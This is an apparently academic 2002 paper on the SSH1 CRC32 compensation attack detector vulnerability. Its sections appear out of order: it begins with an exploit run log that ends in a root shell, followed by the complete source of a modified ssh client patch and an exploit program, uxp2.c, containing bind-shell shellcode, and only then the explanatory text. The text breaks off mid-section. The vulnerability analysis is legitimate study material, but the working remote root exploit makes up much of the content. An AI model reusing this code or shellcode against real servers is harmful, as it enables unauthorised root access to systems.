Testing h..buf offset: 0x00005800 B (prev. step=0x00001000h) FOUND. Decreasing by 0x00000400
Testing h..buf offset: 0x00005000 B (prev. step=0x00000800h) NOT FOUND. Increasing by 0x00000200
Testing h..buf offset: 0x00005400 B (prev. step=0x00000400h) FOUND. Decreasing by 0x00000100
Testing h..buf offset: 0x00005200 B (prev. step=0x00000200h) FOUND. Decreasing by 0x00000080
Testing h..buf offset: 0x00005100 B (prev. step=0x00000100h) FOUND. Decreasing by 0x00000040
Testing h..buf offset: 0x00005080 B (prev. step=0x00000080h) NOT FOUND. Increasing by 0x00000020
Testing h..buf offset: 0x000050c0 B (prev. step=0x00000040h) FOUND. Decreasing by 0x00000010
Testing h..buf offset: 0x000050a0 B (prev. step=0x00000020h) NOT FOUND. Increasing by 0x00000008
Testing h..buf offset: 0x000050b0 B (prev. step=0x00000010h) NOT FOUND. Increasing by 0x00000004
Testing h..buf offset: 0x000050b8 B (prev. step=0x00000008h) FOUND. Decreasing by 0x00000002
Found exact distance: 0x000050b4
Finding lower kernel area boundary
Testing h..boundary offset 0xb7f88500 NOT FOUND. (SEQV)
Testing h..boundary offset 0xb7f884fc NOT FOUND. (SEQV)
Testing h..boundary offset 0xb7f884f8 FOUND. (CRC32 Attack Detected)
Trying to run shellcode. If output stalls, telnet to 192.168.1.1:36864
Trying shellcode/ (eip_MSW@0xbfffda00 pres_MSW=0x0806 targ_MSW=0x0808)
[1]+ Stopped ../uxp2
[root@localhost exploit]# kill %1
[1]+ Stopped ../uxp2
[root@localhost exploit]#
[root@localhost exploit]# telnet 192.168.1.1 32864
Trying 192.168.1.1...
telnet: connect to address 192.168.1.1: Connection refused
[root@localhost exploit]# telnet 192.168.1.1 36864
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
: command not found
ls -l;
total 480
drwxr-xr-x 2 root root 4096 Mar 8 18:30 bin
drwxr-xr-x 3 root root 4096 Feb 28 22:26 boot
-rw------- 1 root root 520192 Mar 10 23:08 core
drwxr-xr-x 16 root root 77824 Mar 12 21:21 dev
drwxr-xr-x 60 root root 8192 Mar 19 19:24 etc
drwxr-xr-x 10 root root 4096 Mar 15 00:04 home
drwxr-xr-x 2 root root 4096 Jun 21 2001 initrd
drwxr-xr-x 7 root root 4096 Mar 4 15:45 lib
drwxr-xr-x 2 root root 16384 Sep 2 2001 lost+found
drwxr-xr-x 2 root root 0 Feb 28 22:32 misc
drwxr-xr-x 4 root root 4096 Nov 23 17:13 mnt
lrwxrwxrwx 1 root root 13 Jan 20 15:09 mp3 -> /mnt/hdd1/MP3
drwxr-xr-x 2 root root 4096 Aug 23 1999 opt
dr-xr-xr-x 180 root root 0 Feb 28 22:32 proc
drwxr-x--- 29 root root 4096 Mar 19 18:55 root
drwxr-xr-x 2 root root 4096 Mar 8 18:31 sbin
lrwxrwxrwx 1 root root 18 Nov 20 23:12 scratch -> /mnt/hdc1/scratch/
drwxrwxrwt 13 root root 4096 Mar 19 19:10 tmp
drwxr-xr-x 17 root root 4096 Feb 5 18:11 usr
drwxr-xr-x 22 root root 4096 Sep 2 2001 var
lrwxrwxrwx 1 root root 14 Nov 16 19:48 www -> /mnt/hdc1/www/
: command not found
exit;
Connection closed by foreign host.
[root@localhost exploit]#
7.3 Source code files for the exploit
7.3.1 packet.diff
Download packet.diff
--- packet.c Sat Oct 14 08:23:12 2000
+++ packet_modified.c Tue Mar 19 20:24:25 2002
@@ -125,6 +125,9 @@
/* Session key information for Encryption and MAC */
Kex *kex = NULL;
+/* pekka.korpinen@hut.fi, kalle.lyytikainen@hut.fi */
+/* HACK - Packet Number */
+int count = 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +464,9 @@
unsigned int checksum;
u_int32_t rand = 0;
+ /* HACK - Count sent packets */
+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
@@ -1172,7 +1178,32 @@
void
packet_write_poll()
{
- int len = buffer_len(&output);
+ int len;
+
+ /* --- HACK START --- */
+ FILE *f;
+ unsigned long sz;
+ char buf[50], *ptr, packet[270000];
+
+ if (count == 2)
+ {
+ debug("reading exploit packet from /tmp/exploit_packet");
+ f = fopen("/tmp/exploit_packet","r");
+ fread(buf, 1, 4, f);
+ sz = GET_32BIT(&buf[0])+4;
+ debug("packet length = %un", sz);
+
+ buffer_clear(&output);
+ buffer_append(&output, packet, sz);
+ ptr = buffer_ptr(&output);
+ fread(ptr, 1, sz, f);
+ fclose(f);
+
+ count++;
+ }
+ /* --- HACK END --- */
+
+ len = buffer_len(&output);
if (len > 0) {
len = write(connection_out, buffer_ptr(&output), len);
if (len <= 0) {
7.3.2 uxp2.c
Download uxp2.c
/*
THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
Exploit code for using the modified ssh
2002-03-20
Authors:
Pekka Korpinen, pekka.korpinen@hut.fi / Helsinki University of Technology
Kalle Lyytikäinen, kalle.lyytikainen@hut.fi / Helsinki University of Technology
This code is based on the reverse-engineering work of the
shack implementation. Shellcode is by anathema.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
// Target host
char host[] = "192.168.1.1";
// Target port
int port = 2222;
// Packet length (don't touch)
unsigned long packet_length = 102400;
// The packet buffer
char *buffer = NULL;
/*
* Linux/x86
* TCP/36864 portshell (old, could be optimized further)
*/
char shellcode[] = /* anathema <anathema@hack.co.za> */
/* main: */
"xebx72" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
/* socket() */
"x29xc0" /* subl %eax, %eax */
"x89x46x10" /* movl %eax, 0x10(%esi) */
"x40" /* incl %eax */
"x89xc3" /* movl %eax, %ebx */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x40" /* incl %eax */
"x89x46x08" /* movl %eax, 0x08(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* bind() */
"x43" /* incl %ebx */
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */
"x88x46x08" /* movb %al, 0x08(%esi) */
"x29xc0" /* subl %eax, %eax */
"x89xc2" /* movl %eax, %edx */
"x89x46x18" /* movl %eax, 0x18(%esi) */
"xb0x90" /* movb $0x90, %al */
"x66x89x46x16" /* movw %ax, 0x16(%esi) */
"x8dx4ex14" /* leal 0x14(%esi), %ecx */
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */
"x43" /* incl %ebx */
"x43" /* incl %ebx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */
"x89x56x10" /* movl %edx, 0x10(%esi) */
"xb0x66" /* movb $0x66, %al */
"x43" /* incl %ebx */
"xcdx80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */
"xb0x3f" /* movb $0x3f, %al */
"x29xc9" /* subl %ecx, %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */
"x89x76x0c" /* movl %esi, 0x0c(%esi) */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */
"xb0x0b" /* movb $0x0b, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8x89xffxffxff" /* call start */
"/bin/sh";
void buffer_init()
{
buffer = (char *) malloc(packet_length+8);
}
void buffer_destroy()
{
if (buffer)
free(buffer);
}
void insert_crc32_compensation_attack_pattern(unsigned long *ptr,
unsigned long value1, unsigned long value2)
{
int positions[] = {0,6,9,10,16,20,21,22,24,25,27,28,30,31,32,-1};
int i;
for (i=0; positions[i]!=-1; i++) {
ptr[ positions[i]*2 ] = value1;
ptr[ positions[i]*2+1 ] = value2;
}
}
void change_word_order()
{
int i;
char ch, ch2, *aux;
for(i = 0 ; i < 4+packet_length ; i+=4) {
aux = buffer + i;
ch=*aux;
*aux=*(aux+3);
*(aux+3)=ch;
ch=*(aux+1);
*(aux+1)=*(aux+2);
*(aux+2)=ch;
}
}
int send_packet_and_check_result(char *grepstr)
{
char commandline[512];
int ret;
FILE *f;
// Write packet
f = fopen("/tmp/exploit_packet", "wb");
fwrite(buffer, 1, (packet_length+8), f);
fclose(f);
sprintf(commandline, "%s -p %i -v -l root %s 2> /tmp/output.txt", PATH_SSH, port, host);
ret = system(commandline);
if (grepstr != NULL) {
sprintf(commandline, "grep %s /tmp/output.txt > /dev/null", grepstr);
ret = system(commandline);
}
return ret;
}
int send_packet_shellcode(unsigned long buffer_offset, unsigned long eip_offset, unsigned int presumed_MSW, unsigned int target_MSW)
{
int ret, i;
unsigned long *ptr, buffer_offset_slide, temp;
char ch,ch2;
// Set the packet lengths (first one for the ssh-client)
// (second one is sent to the server)
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
// NOP sled (to entire packet)
memset(ptr, 0x90, packet_length);
// Running j to target_MSW (writing into the buffer, FFFF)
// The +1 in "target_MSW+1" must be used because j starts at 0
buffer_offset_slide = buffer_offset + 3;
for (i=0; i < (target_MSW + 1) * 8 && i < packet_length; i+=8, buffer_offset_slide += 4) {
*(ptr++) = buffer_offset_slide;
*(ptr++) = 0x7350ffff;
}
// Inserting CRC32 compensation attack pattern
// Change the order of MSW-LSW
ch = (target_MSW+1)&0xff;
ch2 = ((target_MSW+1)&0xff00) >> 8;
temp = (ch<<24)+(ch2<<16)+0x9090;
insert_crc32_compensation_attack_pattern(ptr, buffer_offset_slide-1, temp);
// Place EIP overwrite blocks
ptr = (unsigned long *) buffer;
ptr += 2; // skip the length information
ptr[presumed_MSW * 2] = eip_offset;
ptr[target_MSW * 2] = eip_offset;
// Change the word order in buffer
change_word_order();
// Insert the shellcode (no word-order things here)
memcpy(buffer+8+packet_length-strlen(shellcode)-16, &shellcode, strlen(shellcode));
// Send packet (no grepping)
ret = send_packet_and_check_result(NULL);
return ret;
}
int send_packet_kernel(unsigned long kernel_offset, unsigned long buffer_offset)
{
int ret, i;
unsigned long *ptr;
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
for (i=0; i<packet_length; i+=8) {
*(ptr++) = kernel_offset;
*(ptr++) = 0x7350ffff;
}
ptr = (unsigned long *) buffer;
ptr += 2;
insert_crc32_compensation_attack_pattern(ptr+2, buffer_offset+6, 0x0100ffff);
change_word_order();
ret = send_packet_and_check_result("crc32");
return ret;
}
int find_stack(unsigned long start_offset, unsigned long buffer_offset)
{
unsigned long offset;
long step;
int ret;
int count;
offset = start_offset;
printf("Finding lower kernel area boundaryn");
while (1) {
printf(" Testing h..boundary offset 0x%08x ", offset*2);
fflush(stdout);
ret = send_packet_kernel(offset, buffer_offset);
if (ret == 0) {
printf("FOUND. (CRC32 Attack Detected)n");
break;
}
else {
printf("NOT FOUND. (SEQV)n");
}
// offset -= 0x800;
offset -=2;
}
return offset+2; // We only need the exact h..kernel distance
}
int buffer_test(unsigned long start_offset, unsigned long packet_length)
{
FILE *f;
int ret, i, j;
unsigned long *ptr;
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
for (i=0, j=0; i<packet_length; i+=16, j+=4) {
*(ptr++) = start_offset+j;
*(ptr++) = 0xffffffff;
*(ptr++) = start_offset+j+1;
*(ptr++) = 0xffffffff;
}
change_word_order();
ret = send_packet_and_check_result("Corrupted");
return ret;
}
unsigned long find_buffer(unsigned long start_offset, unsigned stop_offset)
{
int ret;
unsigned long offset;
long step;
// Find estimate for h..buf distance
printf("Finding estimate for h..buf distancen");
offset = start_offset;
while (1) {
printf(" Testing h..buf offset: 0x%08x B", offset*2); // 2 -> 16-bit offset
fflush(stdout);
ret = buffer_test(offset, packet_length);
if (ret == 0) {
printf(" FOUND (Corrupt bytes)n");
break;
}
else {
printf(" NOT FOUND (SEQV)n");
}
offset += packet_length/2/2;
if (offset > stop_offset) {
printf("Stop offset reached. Exitingn");
return 0;
}
}
// Find exact distance
printf("Finding exact h..buf distancen");
// Calculate the step size
step = 1;
while (1) {
if (step > packet_length/2/2/2)
break;
step = step<<1;
}
offset -= step;
while(step > 3) {
printf(" Testing h..buf offset: 0x%08x B (prev. step=0x%08xh)", offset*2, step*2);
fflush(stdout);
ret = buffer_test(offset, packet_length);
step = step/2;
if (ret==0) {
printf(" FOUND. Decreasing by 0x%08xn", step);
offset -= step;
}
else {
printf(" NOT FOUND. Increasing by 0x%08xn", step);
offset += step;
}
}
printf("Found exact distance: 0x%08xn", offset*2);
return offset;
}
void try_shellcode(unsigned long eip_guess, unsigned long buf_offset, unsigned long kernel_offset)
{
long int higher, lower, p, t; // Offsets to seach, expands from the middle
unsigned long h, eip_MSW_offset, roof_reached = 0;
h = 0xc0000000 - kernel_offset * 2;
// eip_offset must point to the MSW of eip, which resides at higher half of eip. Convert to 16-b offset
eip_MSW_offset = (eip_guess - h + 2) / 2;
higher = 0;
lower = -4;
printf("Trying to run shellcode. If output stalls, telnet to %s:36864n", host);
while(1) {
for(p=0x805 ; p<=0x806 ; p++) {
for(t=p+1 ; t<=0x808 ; t++) {
if (eip_guess+higher < 0xc0000000) {
printf(" Trying shellcode / (eip_MSW@0x%08x pres_MSW=0x%04x targ_MSW=0x%04x)n", eip_guess+higher, p, t);
send_packet_shellcode(buf_offset, eip_MSW_offset + higher/2, p, t);
}
else if (!roof_reached && eip_guess+higher >= 0xc0000000) {
printf("Higher search hit kernel bound. Continue with lower search only.n");
roof_reached = 1;
}
printf(" Trying shellcode \ (eip_MSW@0x%08x pres_MSW=0x%04x targ_MSW=0x%04x)n", eip_guess+lower, p, t);
send_packet_shellcode(buf_offset, eip_MSW_offset + lower/2, p, t);
}
}
higher += 4;
lower -= 4;
}
}
int main(int argc,char *argv[])
{
unsigned long kernel_offset, buf_offset;
// initialize the buffer
buffer_init();
// find the buf
// 1st arg : start search from this offset
// 2nd arg : stop search to this offset
buf_offset = find_buffer(0x0, 102400/2*10);
// find the stack
// 1st arg : start search from this (16-bit) offset (high limit)
// 2nd arg : found buf offset
kernel_offset = find_stack(0xb7f88500/2, buf_offset);
// try to send and run shellcode
// 1st arg : initial guess where the eip is living (absolute 8-bit address)
// 2nd arg : found buf offset
// 3rd arg : found stack (0xc0000000) offset
try_shellcode(0xc0000000 - 0x2600, buf_offset, kernel_offset);
// destroy the buffer
buffer_destroy();
return 0;
}
sshd CRC32 compensation attack detector vulnerability explained
March 26, 2002
Korpinen Pekka, 48179S
pkorpine@cc.hut.fi
Department of Electrical Engineering
Lyytikäinen Kalle, 47992V
kalyytik@cc.hut.fi
Department of Computer Science
Helsinki University of Technology
This paper is an analysis of a security weakness in many SSH1 server implementations. Ssh servers introduced a detection mechanism against CRC32 compensation attack. this detection function includes a design fault which enables remote hosts to write arbitrary values to server memory. The authors reverse engineered a proprietary exploit implementation and wrote their own implementation of the exploit. This paper describes the vulnerability, the exploitation process, the author's exploit implementation, and means for protecting hosts against this attack. This paper is also a project for the course 'Tik-110.452 Tietojärjestelmien käytännön turvallisuuden erikoiskurssi' at Helsinki University of Technology.
0 Table of Contents
1 Introduction - SSH protocol
2 Vulnerability in SSH1.5
2.1 Buffer overflow
2.2 Preconditions - Affected ssh daemons
2.3 Linux memory layout
3 Exploits
3.1 First incidents
3.2 Problems
3.3 Available implementations
3.4 Shellcode
4 Our exploit
4.1 Goals
4.2 Resources
4.3 Process
4.3.1 Reverse Engineering
4.3.2 Packet sending
4.3.3 Finding distance to 'buf'
4.3.4 Finding distance to kernel space
4.3.5 Sending shellcode
4.3.6 Executing shellcode
4.4 Using exploit
4.5 Advantages and Disadvantages
5 Counter actions
5.1 Detecting attacks
5.2 Required actions after being attacked
5.3 Preventive actions
6 References
7 Appendices
7.1 Shellcode
7.2 Exploit usage
7.3 Source code files for the exploit
7.3.1 packet.diff
7.3.2 uxp2.c
1 Introduction - SSH protocol
The SSH (Secure Shell) protocol provides a standardized way to communicate on a secured channel. All communications between SSH client and SSH daemon are encrypted. The encryption is done using a symmetric cipher (DES, 3DES and Blowfish, for example). The encryption key is exchanged at the beginning of the connection using RSA keys.
The (SSH) client creates a connection to the (SSH) server which is listening on a specific port, usually 22. The server accepts the connection and responds by sending back its version identification string. The client sends its own identification. After both sides have been identificated they switch to a packet based binary protocol. The server sends its host key. The host key is a unique RSA key used to authenticate the host and it is regenerated every hour. The client generates a 256 bit session key, encrypts it using both RSA keys, and sends the encrypted session key and selected cipher type to the server. Now both sides turn on encryption using the selected encryption algorithm and key. Finally the server sends an encrypted confirmation message. At this point the channel is secured. The client then tries to authenticate itself using any of the available authentication methods (password, RSA authentication etc). After successful authentication, the client can allocate a pseudo tty, start port forwarding, or execute a shell command [23].
When the client or the server receives an encrypted packet, it checks if the packet is tampered with using the crc32 compensation attack detector. The detection algorithm checks the packet before it is parsed in any way. The first case when this algorithm is used is when the client sends its authentication request.
Maximum packet length is about 256k bytes.
2 Vulnerability in SSH1.5
The crc32 compensation attack detector in various SSH versions has a bug that allows an evil attacker to write to memory locations on the server side. If the packets are smartly constructed, they may allow code to be executed on the server side. Because the server is usually being run under the root account, this vulnerability gives the attacker root access to the host.
The memory writing and running a code on the host can be inspected as the casual buffer overflow exploits even though in this case the buffer overflow is not such straightforward to do as usually.
2.1 Buffer overflow
Buffer overflow exploits are based on the fact that the return address of currently running function is kept on the stack. When a function wants to make a function call, it pushes its current instruction pointer to the stack (among other possible data) and jumps to the address of the callee. When the callee reaches it's end (e.g. return-clause in C) it retrieves the stored instruction pointer from the stack and makes a jump to it. Now the caller can continue it's execution. If the return address is manipulated during the execution of the callee, the point of execution is transferred to a different location when the callee returns. This makes the running of inserted code possible.
If we are inserting data on a statically allocated buffer we must be sure that the buffer can hold the all data (e.g. strlen(data) < strlen(buffer)). Usually progammer's won't check the length of the source because they are making assumptions of the length. If the source's length is greater than the buffer size, the buffer is overflown. Because the statically allocated buffers are usually kept on the stack, this allows the source data to overwrite the return address.
[Example:] If a program has a buffer, say 128 bytes in length. The program reads an argument from the command-line. The argument is supposedly be a password, so the 128 bytes is surely enough - no need to check. The main function calls a subfunction with the command line parameter as an in-argument. The subfunction has the mentioned buffer and it simply copies the argument to the buffer (without length checking!). This works ok if the source length is below 128 bytes. An evil attacker could overflow the buffer easily because of the lack of checks. He runs the program with an argument that is longer than 128 bytes. This causes the buffer to overflow.
The argument:
[NNNNNNNNNSSSSSSSSSSSJJJJJJJJJJJJJJJJJJJJJJJ]
The buffer in the stack with the return address:
[xxxxxxxxxxxxxxxxxxxxxxx]....[RET]...
The buffer after overflow:
[NNNNNNNNNSSSSSSSSSSSJJJ]....[ J ]...
The return address is overwritten with a value J. The specific location of the return address is unknown to the attacker. He can make a so-called NOP sled (marked as N) before the actual shellcode (S). NOP is a special instruction that doesn't do anything. In this way, the jump can be a guess and if the jump lands on the NOP sled, it slides to the beginning of the actual shellcode.
When the sub-function is ready to return (and when the return address is accidentally overwritten!), the program jumps to the address specified on the return address field in the stack. The point of execution is now pointing on the NOP sled and the shellcode is executed. The shellcode can now for example open a new shell or a telnetable back port on the host. This is all done on the same account as the program was run. [End of example] [1]
2.2 Preconditions - Affected ssh daemons
The following versions are reported to be vulnerable:
SSH-1.5-1.2.24 .. 31
SSH-1.5-1.3.6 .. 10
SSH-1.5-1.3.6
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.1
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3
SSH-1.99-2.0.11 (with Version 1 fallback)
SSH-1.99-2.0.12 (with Version 1 fallback)
SSH-1.99-2.0.13 (with Version 1 fallback)
SSH-1.99-2.1.0.pl2 (with Version 1 fallback)
SSH-1.99-2.1.0 (with Version 1 fallback)
SSH-1.99-2.2.0 (with Version 1 fallback)
SSH-1.99-2.3.0 (with Version 1 fallback)
SSH-1.99-2.4.0 (with Version 1 fallback)
SSH-1.99-3.0.0 (with Version 1 fallback)
SSH-1.99-3.0.1 (with Version 1 fallback)
SSH-1.5-OpenSSH-2.1
SSH-1.5-OpenSSH_2.1.1
SSH-1.5-OpenSSH_2.2.0
SSH-1.5-OpenSSH_2.2.0p1
One can check the vulnerability by sending a long enough login name with a client (Note. newest clients check the length by themselves). If the server just crashes, the server is vulnerable. Long enough is 88 000 characters.
There also exists a perl script that does the checking automatically. [2]
2.3 Linux memory layout
The linux memory layout is in crucial role in this exploit. One must know something about the architecture. The figure below shows the general layout of the memory seen by an user process:
top of memory
0xffff ffff ____________________
| |
| KERNEL | No read/write
|____________________|
0xc000 0000 | |
| STACK | read/write
|____________________|
| |
| LIBRARIES |
0x4000 0000 |____________________|
| |
| HEAP | read/write (malloc)
|____________________|
| |
| BSS | read/write
|____________________|
| |
| DATA | read/write
|____________________|
| |
| TEXT (aka CODE) | read, no write
0x0800 0000 |____________________|
| |
| KERNEL | No read/write
|____________________|
0x0000 00000
bottom of memory
The addresses are in the absolute form. The stack grows down (i.e. to smaller addresses) and heap grows up. Dynamically allocated arrays are created on heap (size < 128kB, address are form of 0x080x xxxx) or on the library area (size > 128kB, address are form of 0x400x xxxx). The addresses of specific variables and functions during the run may vary a bit from host to host but the addresses mentioned on the figure are constants.
On linux process's memory map can be seen by running cat /proc//maps. It displays addresses, sizes, attributes (read, write, execute), and the sources of loaded programs and libraries. The readelf utility can be used to see how the linker has organized the objects. [3] [4]
3 Exploits
The exploit is based entirely on the detect_attack() function in the SSH implementation. The function should detect the crc32 compensation attack but it introduces another security vulnerability.
Critical parts of the detect_attack() function:
--------------------------------------------------------
int detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
..
static u_int16_t *h = (u_int16_t *) NULL;
static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
register u_int32_t i, j;
u_int32_t l;
..
#1 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
;
if (h == NULL) {
debug("Installing crc compensation attack detector.");
#2 n = l;
h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
..
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
#3 for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
i = (i + 1) & (n - 1)) {
if (h[i] == HASH_IV) {
if (!CMP(c, IV)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
#4 } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
}
#5 h[i] = j;
}
return (DEATTACK_OK);
}
--------------------------------------------------------
The function is called after each received SSH packet. The 'buf' argument is the buffer where incoming (encrypted) packet's payload is located, 'len' is the length of the buffer (note: the length is delivered on the ssh-packet, so the actual buffer could be longer). The 'IV' is always NULL.
The problem resides on the #2 where a 32-bit integer ('l') is assigned on a 16-bit integer ('n'). If the lower word of the 'l' is zero, the 'n' is assigned to zero. The 'l' is calculated on #1, and is dependant on the 'len' variable. If the 'len' is bigger than about 88000, the 'n' is set to zero.
Then the 'h' is allocated with call to malloc and the requested becomes to zero because n==0. The allocated size is the minimum allocation block. This is 12 bytes in current linux platforms.
The outer for-loop (near #3) goes through the whole packets. The variable 'j' is the block number (blocks are 8 bytes long). On #3 the HASH()-macro gets the first 32-bits from the current block. Because the 'n' is zero the (n-1)-clause is evaluated as 0xffff. So, the variable 'i' has the first 32-bits of the current block.
On #5 is the assignment operation. This is where the memory can be written. The 'h' is the pointer to 16-bit values. So the "h[i] = j" clause can be expressed also with byte pointers *(h+2*i) = j Thus, the value of 'j' (the current block number) is written to a specific distance from the 'h'. Because the value of 'i' is fetched from the packet and the 'j' is the block number, the 'i' can be used as a offset value and the placement of the 'i' can be used as the value that is written to the memory.
The following figure hopefully clears the idea:
block incoming packet
number ('buf')
('j')
___________________
0000 | 00000000 xxxxxxxx |
0001 | 00000000 xxxxxxxx |
0002 | 00000000 xxxxxxxx |
0003 | 00000000 xxxxxxxx |
0004 | 00000000 xxxxxxxx |
0005 | 00000000 xxxxxxxx |
0006 | beefcafe xxxxxxxx |
....
0332 | 00000042 xxxxxxxx |
....
For example, on the 6th block:
j = 6
i = 0xbeefcafe
So, the following assignment is done:
h[i] = j; ===> h+2*i = j; ===> h+2*0x1234abcd = 6;
And on the 332th block:
j = 332
i = 0x42
h[i] = j; ===> h+2*i = j; ===> h+2*0x00000123 = 332;
Notes to remember: The value in the packet means the offset (multiplied by 2) from the address of 'h' and the place where the value is located means the value to be stored in memory [5].
The shellcode insertion is done basically with a packet like this (knowledge of the exact parameters is required):
___________________
0000 | xxxxxxxx ffffffff |
| .... |
| ZZZZZZZZ xxxxxxxx | WRITE THE VALUE TO EIP
| .... |
| ZZZZZZZZ xxxxxxxx | WRITE THE NEW VALUE TO EIP
| xxxxxxxx xxxxxxxx | CRC32 ATTACK PATTERN START
| .... |
| xxxxxxxx xxxxxxxx | CRC32 ATTACK PATTERN END
| 90909090 90909090 | NOP SLED
| .... |
| xxxxxxxx xxxxxxxx | SHELL CODE
|___________________|
xxxxx =
ZZZZZZZZ = (offset to the high word of the stored instruction pointer)/2,
XXXX = value of the instruction pointer (high word)
YYYY = where to jump (high word, low word stays the same)
3.1 First incidents
The vulnerability was announced on February 8th 2001. It was discovered by Michal Zaleski of the BindView RAZOR Team. [6] [7]
Even thought the vulnerability was discovered early, many site administrators didn't update their SSH daemons. The experts assumed that the possibility of the exploit were ridiculously small and that there will not be any working mass exploit engines. They were wrong. The incident below is one of the first incidents that were analysed. It clearly shows that the exploit can be used. The rumour says that the big finnish hack incidents on winter 2001-2002 were also done by using this exploit.
"On October 6, 2001, intruders originating from network blocks in the Netherlands used an exploit for the crc32 compensation attack detector vulnerability to remotely compromise a Red Hat Linux system on the UW network running OpenSSH 2.1.1." This vulnerability is described in CERT Vulnerability note VU#945216 [6]:
Once in the system, a series of operating system commands were replaced with trojan horses to provide back doors for later entry and to conceal the presence of the intruders in the system. A second SSH server was run on a high numbered port (39999/tcp). The system was then used for broad scanning (outbound from the UW network) to identify more systems running OpenSSH 2.1.1, some of which were then attacked manually." [8] [9]
3.2 Problems
As one can see after examining the detect_attack() function, the hardest problem in exploiting is the addresses of critical variables and the address of the return pointer.
A successful exploit must guess the following parameters (or some parameters that the following can be calculated from):
distance between 'h' and 'buf'
distance between 'h' and the return address on the stack
the value of the return address (higher word enough)
the absolute address of 'buf'
With these parameters the exploit is somewhat straighforward. Educated guesses can be made with the knowledge of the host (operating system, processor, linux distribution, kernel version etc). This information should be easy to gather using automated tools. The attacker could for example get the version strings of mail, ftp, http, ssh, imap, and pop servers and compare them with the default versions of some distributions. This way he can get the same SSHD daemon and maybe try it on his lab.
Part of the parameters can be find using brute force methods. The buffer 'buf' can be found using a packet that writes to a specific region of memory. Making a educated guess of the boundaries where the buffer is located and starting to write from there. If the server dies (client sees connection closing), the algorithm should change the address and start again. The server dies because of segmentation fault (i.e. writing to a read-only memory etc). If the server reports something like "invalid bytes on packet", the writing was successful and the buffer is located (on high probability).
3.3 Available implementations
The implementations of this exploit are not easy to get. We were able to find a binary exploit called shack. This can be downloaded from [10].
The source code of the binary is not available but an analysis of an attack done with this tool can be read at [11].
The shack tries to locate the parameters using couple binary searches. After it has revealed good enough estimates of memory locations, it starts the bruteforcing. The shellcode of the shack creates a root shell on the host machine and the attacker can use it to install the trojans.
We tried the shack on couple of servers running the same version of OpenSSH. One host was succesfully exploited with this, the other one wasn't. Our exploit worked for both.
Another exploit by zip/TESO should be wondering somewhere, at least there are some analysis about that: [8]
Both of the analysis are concentrated on the network traffic and detection. It is kind of disappointing that nobody has analyzed the exploits in the lower levels, or how it is done.
We used the tcpflow-program to capture the network traffic created by shack. After analyzing the traffic we were able to reverse engineer the code almost completely. The process is documented in Chapter 4 [12].
3.4 Shellcode
Shellcode means the code that the attacker wants to run on a target computer. The code creates a shell hopefully running as root account. One version of shellcode is a portshell. It creates a backdoor that listens some specific TCP port on the target machine. When the attacker telnets to the target to that port, the portshell binds a shell to the tcp stream and the attacker has his own telnet-type access (with root-account!).
The shellcode is typically ran only a few minutes. In that time the attacker tries to install his rootkits and trojans, clears the logs and traces. After that the attacker uses some ordinary access type to get to the host.
Shellcodes are always platform dependant because they are made of assembly instructions. The attacker must know what platform is on the target. Shellcodes usually don't contain any zero bytes because then they couldn't be used with strpcy() functions. For example 'mov eax,0' must be transformed as 'xor eax,eax'. This does the eax clearing but doesn't contain zero when its run through assembler.
A shellcode example (port shell) with sources can be seen at [13]
The Phrack magazine has a great article about shellcodes and buffer overflows: [1]
4 Our exploit
4.1 Goals
The meaning of our exploit project is to hijack a remote host running sshd. this is attempted using sshd's vulnerabilities discussed in Chapter 2. The goal is to be able to access the remote host with root privileges and thereby gain access to all information and controls on the target host.
4.2 Resources
ssh daemon (modified)
